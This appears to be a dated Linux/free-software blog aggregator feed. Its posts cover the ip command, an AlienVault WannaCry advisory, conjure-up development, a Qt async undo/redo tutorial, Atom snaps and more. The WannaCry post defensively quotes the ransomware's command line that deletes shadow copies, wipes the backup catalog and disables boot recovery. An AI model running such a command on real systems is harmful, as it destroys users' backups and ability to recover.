13 May, 2017 07:00AM

May 12, 2017

Mathieu Trudel: If you're still using ifconfig, you're living in the past

The world evolves

I regularly see "recommendations" to use ifconfig to get interface information in mailing list posts, bug reports, and other places. I might even be guilty of it myself. Still, the world of networking has evolved quite a lot since ifconfig was the de facto standard to bring up a device, check its IP, or set an IP.

Following some improvements in the kernel and the gradual move to driving network things via netlink, ifconfig has been largely replaced by the ip command.

Running just ip yields the following:

Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
       ip [ -force ] -batch filename
where  OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |
                   tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |
                   netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila }
       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |
                    -h[uman-readable] | -iec |
                    -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |
                    -4 | -6 | -I | -D | -B | -0 |
                    -l[oops] { maximum-addr-flush-attempts } | -br[ief] |
                    -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |
                    -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}

I understand this may look complicated to some people, but the gist of it is that with ip, you interact with objects and apply some kind of function to them. For example:

ip address show

This is the main command that would be used in place of ifconfig. It will display the IP addresses assigned to all interfaces. To be precise, it shows you the layer 3 details of each interface: the IPv4 and IPv6 addresses, whether it is up, and the different properties related to the addresses...

Another command will give you details about the layer 2 properties of the interface: its MAC (Ethernet) address and so on, even though some of this is also shown by ip address:

ip link show

Furthermore, you can set devices up or down (similar to ifconfig eth0 up or ifconfig eth0 down) simply by using:

ip link set DEVICE up or ip link set DEVICE down

As shown above, there are lots of other objects that can be interacted with using the ip command. I'll cover another: ip route, in another post.
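A few more everyday invocations, using the loopback interface since it exists on every Linux host; the -br (brief) and -o (one line per record) flags are part of modern iproute2, as the usage output above shows:

```shell
# One-line-per-record output, convenient for scripts:
ip -br link show lo
# Extract just the IPv4 address of an interface without screen-scraping:
ip -4 -o address show dev lo | awk '{print $4}'
```

The one-line output forms are much friendlier to awk and grep than ifconfig's multi-line blocks ever were.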

Why is this important?

As time passes, more and more features are becoming easier to use with the ip command instead of with ifconfig. We've already stopped installing ifconfig on desktops (it still gets installed on servers for now), and people have been discussing dropping net-tools (the package that ships ifconfig and a few other old commands that are replaced) for a while now. It may be time to revisit not installing net-tools by default anywhere.

I want to know about your world

Are you still using one of the following tools?

/bin/netstat    (replaced by ss, for which I'll dedicate another blog post entirely)
/sbin/ipmaddr   (replaced by ip maddress)
/sbin/mii-tool    (ethtool should appropriately replace it)

If so and there is just no alternative to using them that comes from iproute2 (well, the ip or ss commands) that you can use to do the same, I want to know about how you are using them. We're always watching for things that might be broken by changes; we want to avoid breaking things when possible.
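For netstat in particular, ss covers the common cases already; a couple of rough equivalents as a sketch (the ss flags shown are from iproute2):

```shell
# Listening TCP sockets with numeric addresses: roughly "netstat -tln"
ss -tln
# Protocol summary statistics: roughly "netstat -s"
ss -s
```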

12 May, 2017 08:05PM by Mathieu Trudel-Lapierre

hackergotchi for Whonix


2nd Patreon Stream Now Public – Let’s talk Quantum

I’ve just wrapped up the second monthly Patreon Live Stream, this time sadly without Patrick, due to an error on my part.

This time I covered quantum computing, the threats it poses to current encryption and verification standards, and what it is going to mean for the future.

You may watch it now here:


If you would like to join us next time or you feel like supporting Whonix, please consider donating to our Patreon:

The post 2nd Patreon Stream Now Public – Let’s talk Quantum appeared first on Whonix.

12 May, 2017 07:20PM by Ego

hackergotchi for AlienVault OSSIM

AlienVault OSSIM

Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability

As of early this morning (May 12th, 2017), the AlienVault Labs team is seeing reports of a wave of infections using a ransomware variant called “WannaCry” that is being spread by a worm component that leverages a Windows-based vulnerability.

There have been reports of large telecommunication companies, banks and hospitals being affected. Tens of thousands of networks worldwide have been hit and the attacks do not appear to be targeted at any specific region or industry. Once infected, victims are asked to pay approximately $300 in Bitcoin, and it appears the attackers have found people willing to pay.

The AlienVault Labs team has created a Pulse in the Open Threat Exchange to share the indicators of compromise we have been able to obtain. These indicators can be used to help identify potential attacks in progress.

One method of command and control and secondary installation has been sinkholed by security researchers, however the attackers can still leverage a second communication mechanism via Tor.

The WannaCry ransomware uses the file extension .wncry, and it also deletes Shadow Copies, a technology introduced into Microsoft platforms as far back as Windows XP and Windows Vista as the Volume Shadow Copy service. This means that even backups produced by tools that rely on this service, such as Windows Backup and System Restore, would be affected as well.

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet (PID: 2292)

The following file is also created in the affected systems: @Please_Read_Me@.txt
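As a rough illustration of how the file-based indicators above could be swept for, here is a minimal sketch. The `.wncry` extension and ransom-note filename come from this post; the scanning helper itself is hypothetical and is not an AlienVault tool — a real investigation should use the full OTX Pulse indicators.

```python
import os

# Known file-based indicators from this post (not an exhaustive IOC list).
RANSOM_EXTENSION = ".wncry"
RANSOM_NOTE = "@Please_Read_Me@.txt"

def find_wannacry_artifacts(root):
    """Walk a directory tree and collect paths matching the file indicators."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            # Match the ransom note exactly, and the extension case-insensitively
            if name == RANSOM_NOTE or name.lower().endswith(RANSOM_EXTENSION):
                hits.append(os.path.join(dirpath, name))
    return hits
```

File artifacts alone are a lagging indicator — by the time `.wncry` files exist, encryption has already happened — so this kind of sweep is only useful for scoping an incident, not preventing one.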

Once it gets on a network, WannaCry exploits a known Microsoft Windows vulnerability (MS17-010) to spread. An exploit for this vulnerability was released as part of the Shadow Brokers leaks back in April. Microsoft released a patch for MS17-010 on March 14th. Administrators are advised to immediately patch any systems that lack this update to avoid potential compromise by WannaCry. So far the only confirmed vector of the attacks is an SMB exploit, which gives WannaCry a worm-like mechanism of spreading.

AlienVault USM Anywhere and USM Appliance are able to detect attempts to exploit this vulnerability via the following IDS signature released by AlienVault on April 18th:

ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response

Yesterday we noted a sharp increase in external scans against our customers for the exploit, and we are investigating if it is related to today's attacks:

We will update this blog post as we discover more information about the ongoing situation.

12 May, 2017 05:58PM

hackergotchi for Ubuntu developers

Ubuntu developers

Adam Stokes: conjure-up dev summary for week 19

conjure-up dev summary for week 19


This week contains a significant change for how we do Localhost deployments and a lot more polishing around the cloud selection experience.

Localhost Deployments

Over the last couple of months we've been monitoring our issues, statistics, and message boards, and we came to the conclusion that it may be time to take further control over the technologies conjure-up requires to work.

Currently, we bundle Juju into our snap, which gives us the ability to validate, test, and lock in to a version we are comfortable shipping to the masses. With LXD, however, we took the approach of using what was already installed on the user's system, or making sure to upgrade to the latest LXD known to work with conjure-up at the time of release. The problem with doing it this way is that the LXD version may get upgraded before we push out a new release, which leaves the big question: will conjure-up continue to work as expected? In most cases the answer is yes; however, there have been times when some form of API change was introduced that caused breakage. Fortunately for us, we haven't seen this problem come up in a long time, but the potential for future problems is still there.

So how do we solve this issue? We sent out a proposal outlining why we wanted to go with a particular solution, and made sure to solicit input from the community, either to get approval or to see if there were other solutions. Read the proposal and the responses for more details on that process and the pros and cons. The conclusion was to go with our proposal and bundle LXD into the conjure-up snap in the same way we do Juju.

This work has been completed and should make its way into conjure-up 2.2. Prior to that, though, we need to make sure to socialize this change, as it will cause users' existing Localhost deployments to not be easily reachable, and to document how users can reach their newly deployed containers.


There has been significant work put in to improve the user experience and to gently warn users when their inputs are incorrect. We modeled the validation framework on what you see in a normal webpage submission form, extending that idea to make a best effort to automatically fix inputs on the fly.

For example, with MAAS deployments conjure-up requires a server address and an API key. If the user inputs just the IP address, we will automatically format it into the correct API endpoint.

After Validation:

That's all for now, remember to check back next week for more conjure-up goodness!

12 May, 2017 01:32PM

Daniel Pocock: Thank you to the OSCAL team

The welcome gift deserves its own blog post. If you want to know what is inside, I hope to see you at OSCAL'17.

12 May, 2017 01:26PM

Daniel Pocock: Kamailio World and FSFE team visit, Tirana arrival

This week I've been thrilled to be in Berlin for Kamailio World 2017, one of the highlights of the SIP, VoIP and telephony enthusiast's calendar. It is an event that reaches far beyond Kamailio and is well attended by leaders of many of the well known free software projects in this space.

HOMER 6 is coming

Alexandr Dubovikov gave me a sneak peek of the new version of the HOMER SIP capture framework for gathering, storing and analyzing messages in a SIP network.

exploring HOMER 6 with Alexandr Dubovikov at Kamailio World 2017

Visiting the FSFE team in Berlin

Having recently joined the FSFE's General Assembly as the fellowship representative, I've been keen to get to know more about the organization. My visit to the FSFE office involved a wide-ranging discussion with Erik Albers about the fellowship program and FSFE in general.

discussing the Fellowship program with Erik Albers

Steak and SDR night

After a hard day of SIP hacking and a long afternoon at Kamailio World's open bar, a developer needs a decent meal and something previously unseen to hack on. A group of us settled at Escados, Alexanderplatz where my SDR kit emerged from my bag and other Debian users found out how easy it is to apt install the packages, attach the dongle and explore the radio spectrum.

playing with SDR after dinner

Next stop OSCAL'17, Tirana

Having left Berlin, I'm now in Tirana, Albania where I'll give an SDR workshop and Free-RTC talk at OSCAL'17. The weather forecast is between 26 - 28 degrees celsius, the food is great and the weekend's schedule is full of interesting talks and workshops. The organizing team have already made me feel very welcome here, meeting me at the airport and leaving a very generous basket of gifts in my hotel room. OSCAL has emerged as a significant annual event in the free software world and if it's too late for you to come this year, don't miss it in 2018.

OSCAL'17 banner

12 May, 2017 09:48AM

May 11, 2017

hackergotchi for SparkyLinux



A new application landed in Sparky repos: Dooble.

Dooble is a secure, open source, WebKit based web browser that provides solid performance, stability, and cross-platform functionality.

From Wikipedia:

Dooble was created to improve privacy. Currently, Dooble is available for FreeBSD, Linux, OS X, OS/2, and Windows. Dooble uses Qt for its user interface and abstraction from the operating system and processor architecture. As a result, Dooble should be portable to any system that supports OpenSSL, POSIX threads, Qt, SQLite, and other libraries.

sudo apt update
sudo apt install dooble


If Dooble does not start, try launching it from a terminal emulator and paste the output on our forums, please.


11 May, 2017 10:58PM by pavroo

hackergotchi for Maemo developers

Maemo developers

How do they do it? Asynchronous undo and redo editors

Imagine we want an editor that has undo and redo capability. But the operations on the editor are all asynchronous. This implies that also undo and redo are asynchronous operations.

We want all this to be available in QML, we want to use QFuture for the asynchronous stuff and we want to use QUndoCommand for the undo and redo capability.

But how do they do it?

First of all we will make a status object, to put the status of the asynchronous operations in (asyncundoable.h).

class AbstractAsyncStatus: public QObject
{
    Q_OBJECT

    Q_PROPERTY(bool success READ success CONSTANT)
    Q_PROPERTY(int extra READ extra CONSTANT)

public:
    AbstractAsyncStatus(QObject *parent): QObject (parent) {}
    virtual bool success() = 0;
    virtual int extra() = 0;
};

We will be passing it around as a QSharedPointer, so that lifetime management becomes easy. But typing that out is going to give us long APIs. So let’s make a typedef for that (asyncundoable.h).

typedef QSharedPointer<AbstractAsyncStatus> AsyncStatusPointer;

Now let’s make ourselves an undo command that allows us to wait for asynchronous undo and asynchronous redo. We’re combining QUndoCommand and QFutureInterface here (asyncundoable.h).

class AbstractAsyncUndoable: public QUndoCommand
{
public:
    AbstractAsyncUndoable( QUndoCommand *parent = nullptr )
        : QUndoCommand ( parent )
        , m_undoFuture ( new QFutureInterface<AsyncStatusPointer>() )
        , m_redoFuture ( new QFutureInterface<AsyncStatusPointer>() ) {}
    QFuture<AsyncStatusPointer> undoFuture()
        { return m_undoFuture->future(); }
    QFuture<AsyncStatusPointer> redoFuture()
        { return m_redoFuture->future(); }

protected:
    QScopedPointer<QFutureInterface<AsyncStatusPointer> > m_undoFuture;
    QScopedPointer<QFutureInterface<AsyncStatusPointer> > m_redoFuture;
};


Okay, let’s implement these with an example operation. First the concrete status object (asyncexample1command.h).

class AsyncExample1Status: public AbstractAsyncStatus
{
    Q_OBJECT

    Q_PROPERTY(bool example1 READ example1 CONSTANT)

public:
    AsyncExample1Status ( bool success, int extra, bool example1,
                          QObject *parent = nullptr )
        : AbstractAsyncStatus(parent)
        , m_example1 ( example1 )
        , m_success ( success )
        , m_extra ( extra ) {}
    bool example1() { return m_example1; }
    bool success() Q_DECL_OVERRIDE { return m_success; }
    int extra() Q_DECL_OVERRIDE { return m_extra; }

private:
    bool m_example1 = false;
    bool m_success = false;
    int m_extra = -1;
};

Let’s make a QUndoCommand that uses a timer to simulate asynchronous behavior. We could also use QtConcurrent’s run function to use a QThreadPool and QRunnable instances that also implement QFutureInterface, of course. Seasoned Qt developers know what I mean. For the sake of example, I wanted to illustrate that QFuture can also be used for asynchronous things that aren’t threads. We’ll use the lambda because QUndoCommand isn’t a QObject, so no easy slots. That’s the only reason (asyncexample1command.h).

class AsyncExample1Command: public AbstractAsyncUndoable
{
public:
    AsyncExample1Command(bool example1, QUndoCommand *parent = nullptr)
        : AbstractAsyncUndoable ( parent ), m_example1(example1) {}
    void undo() Q_DECL_OVERRIDE {
        m_undoFuture->reportStarted();
        QTimer *timer = new QTimer();
        timer->setSingleShot( true );
        QObject::connect(timer, &QTimer::timeout, [=]() {
            QSharedPointer<AbstractAsyncStatus> result;
            result.reset(new AsyncExample1Status ( true, 1, m_example1 ));
            // Deliver the result to whoever is watching the undo future
            m_undoFuture->reportFinished(&result);
            timer->deleteLater();
        } );
        timer->start( 1000 );
    }
    void redo() Q_DECL_OVERRIDE {
        m_redoFuture->reportStarted();
        QTimer *timer = new QTimer();
        timer->setSingleShot( true );
        QObject::connect(timer, &QTimer::timeout, [=]() {
            QSharedPointer<AbstractAsyncStatus> result;
            result.reset(new AsyncExample1Status ( true, 2, m_example1 ));
            m_redoFuture->reportFinished(&result);
            timer->deleteLater();
        } );
        timer->start( 1000 );
    }

private:
    bool m_example1;
};

Let’s now define something we get from the strategy design pattern: an editor behavior. Implementations provide an editor with all of its editing behaviors (abtracteditorbehavior.h).

class AbstractEditorBehavior : public QObject
{
    Q_OBJECT

public:
    AbstractEditorBehavior( QObject *parent) : QObject (parent) {}

    virtual QFuture<AsyncStatusPointer> performExample1( bool example1 ) = 0;
    virtual QFuture<AsyncStatusPointer> performUndo() = 0;
    virtual QFuture<AsyncStatusPointer> performRedo() = 0;
    virtual bool canRedo() = 0;
    virtual bool canUndo() = 0;
};

So far so good, so let’s make an implementation that has a QUndoStack and is therefore undoable (undoableeditorbehavior.h).

class UndoableEditorBehavior: public AbstractEditorBehavior
{
    Q_OBJECT

public:
    UndoableEditorBehavior(QObject *parent = nullptr)
        : AbstractEditorBehavior (parent)
        , m_undoStack ( new QUndoStack ) {}

    QFuture<AsyncStatusPointer> performExample1( bool example1 ) Q_DECL_OVERRIDE {
        AsyncExample1Command *command = new AsyncExample1Command ( example1 );
        m_undoStack->push( command ); // push() invokes the command's redo()
        return command->redoFuture();
    }
    QFuture<AsyncStatusPointer> performUndo() Q_DECL_OVERRIDE {
        const AbstractAsyncUndoable *undoable =
            dynamic_cast<const AbstractAsyncUndoable *>(
                    m_undoStack->command( m_undoStack->index() - 1));
        m_undoStack->undo();
        return const_cast<AbstractAsyncUndoable*>(undoable)->undoFuture();
    }
    QFuture<AsyncStatusPointer> performRedo() Q_DECL_OVERRIDE {
        const AbstractAsyncUndoable *undoable =
            dynamic_cast<const AbstractAsyncUndoable *>(
                    m_undoStack->command( m_undoStack->index() ));
        m_undoStack->redo();
        return const_cast<AbstractAsyncUndoable*>(undoable)->redoFuture();
    }
    bool canRedo() Q_DECL_OVERRIDE { return m_undoStack->canRedo(); }
    bool canUndo() Q_DECL_OVERRIDE { return m_undoStack->canUndo(); }

private:
    QScopedPointer<QUndoStack> m_undoStack;
};

Now we only need an editor, right (editor.h)?

class Editor: public QObject
{
    Q_OBJECT

    Q_PROPERTY(AbstractEditorBehavior* editorBehavior READ editorBehavior CONSTANT)

public:
    Editor(QObject *parent=nullptr) : QObject(parent)
        , m_editorBehavior ( new UndoableEditorBehavior ) { }
    AbstractEditorBehavior* editorBehavior() { return m_editorBehavior.data(); }
    Q_INVOKABLE void example1Async(bool example1) {
        QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
        connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                this, &Editor::onExample1Finished);
        watcher->setFuture ( m_editorBehavior->performExample1(example1) );
    }
    Q_INVOKABLE void undoAsync() {
        if (m_editorBehavior->canUndo()) {
            QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
            connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                    this, &Editor::onUndoFinished);
            watcher->setFuture ( m_editorBehavior->performUndo() );
        }
    }
    Q_INVOKABLE void redoAsync() {
        if (m_editorBehavior->canRedo()) {
            QFutureWatcher<AsyncStatusPointer> *watcher = new QFutureWatcher<AsyncStatusPointer>(this);
            connect(watcher, &QFutureWatcher<AsyncStatusPointer>::finished,
                    this, &Editor::onRedoFinished);
            watcher->setFuture ( m_editorBehavior->performRedo() );
        }
    }

signals:
    void example1Finished( AsyncExample1Status *status );
    void undoFinished( AbstractAsyncStatus *status );
    void redoFinished( AbstractAsyncStatus *status );

private slots:
    void onExample1Finished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit example1Finished( watcher->result().objectCast<AsyncExample1Status>().data() );
        watcher->deleteLater();
    }
    void onUndoFinished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit undoFinished( watcher->result().data() );
        watcher->deleteLater();
    }
    void onRedoFinished() {
        QFutureWatcher<AsyncStatusPointer> *watcher =
                dynamic_cast<QFutureWatcher<AsyncStatusPointer>*> (sender());
        emit redoFinished( watcher->result().data() );
        watcher->deleteLater();
    }

private:
    QScopedPointer<AbstractEditorBehavior> m_editorBehavior;
};

Okay, let’s register this to make it known in QML and make ourselves a main function (main.cpp).

#include <QtQml>
#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include "editor.h"

int main(int argc, char *argv[])
{
    QGuiApplication app(argc, argv);
    // Register the type before any QML that imports it is loaded
    qmlRegisterType<Editor>("be.codeminded.asyncundo", 1, 0, "Editor");
    QQmlApplicationEngine engine;
    engine.load(QUrl(QStringLiteral("qrc:/main.qml")));
    return app.exec();
}

Now, let’s make ourselves a simple QML UI to use this with (main.qml).

import QtQuick 2.3
import QtQuick.Window 2.2
import QtQuick.Controls 1.2
import be.codeminded.asyncundo 1.0

Window {
    visible: true
    width: 360
    height: 360
    Editor {
        id: editor
        onUndoFinished: text.text = "undo"
        onRedoFinished: text.text = "redo"
        onExample1Finished: text.text = "whoohoo " + status.example1
    }
    Text {
        id: text
        text: qsTr("Hello World")
        anchors.centerIn: parent
    }
    Action {
        shortcut: "Ctrl+z"
        onTriggered: editor.undoAsync()
    }
    Action {
        shortcut: "Ctrl+y"
        onTriggered: editor.redoAsync()
    }
    Button {
        text: qsTr("Example 1")
        onClicked: editor.example1Async(true)
    }
}
You can find the sources of this complete example at github. Enjoy!


11 May, 2017 08:09PM by Philip Van Hoof

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Atom is now available as a snap for Ubuntu

There’s a new desktop snap in the Snap store: Atom.

The hackable editor, backed by GitHub

Launched in 2014, Atom has been rapidly adopted by a large community and is considered one of the top language-agnostic code editors. It offers a constantly growing library of 6,000+ add-ons for all purposes, from themes to IDE features.

To install Atom as a snap:

sudo snap install --classic atom

Atom has most of the features you can expect from a modern code editor, such as project trees and autocompletion. It also comes with git integration, a built-in package manager, a file-system browser, multiple panes and a versatile find and replace function that allows you to replace strings in multiple files and across projects.

Open source and built on the cross-platform Electron framework, it provides deep introspection into its own code and is well suited for customization, allowing incredibly useful extensions such as git-time-machine or todo-show.

The git-time-machine extension draws a bubble chart of the git file history at the bottom of the panes and lets you navigate the timeline of changes.

Enabling availability

So why does it make sense to have Atom packaged as a snap? Snaps mean simple installation and update management, without affecting the application: everything works as expected, including extensions.

It also means that when software vendors make them available, it’s easier to access the beta version of their app, or even daily builds. In practice, this snap makes the latest version of Atom easily installable and auto-updatable on Ubuntu 14.04, 16.04 and newer supported releases: goodbye third-party PPAs and general package hunting.

What’s in a classic snap?

You may have noticed that Atom is a classic snap (as seen in the snap install command with the --classic flag), which means it’s not strictly confined. Classic snaps are a way to start snapping complex software that has not been built with relocation in mind. Whereas snaps under strict confinement see /snap/core/current/ as the root of the file system, classic snaps use /, as most legacy packaged apps would do; therefore they can read and write in the host file system, not only in their dedicated confined space.

Here is an introduction to snaps confinement modes:

11 May, 2017 04:31PM by Ubuntu Insights

Ubuntu Podcast from the UK LoCo: S10E10 – Miniature Blushing Steel - Ubuntu Podcast

This week we interview Joey Sneddon, editor of OMG! Ubuntu! We also discuss ripping audio from an Android app, removing dust from a PC, bring you some GUI Love and go over your feedback.

It’s Season Ten Episode Ten of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Joey Sneddon are connected and speaking to your brain.

In this week’s show:

  • We discuss what we’ve been up to recently:
    • Martin has been pirating audio from an Android app.
    • Alan has been getting rid of dust with a new heatsink.
  • We interview Joey Sneddon, editor of OMG! Ubuntu!.

  • We share a GUI Lurve:

  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • This week’s cover image is taken from Vimeo.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

11 May, 2017 02:00PM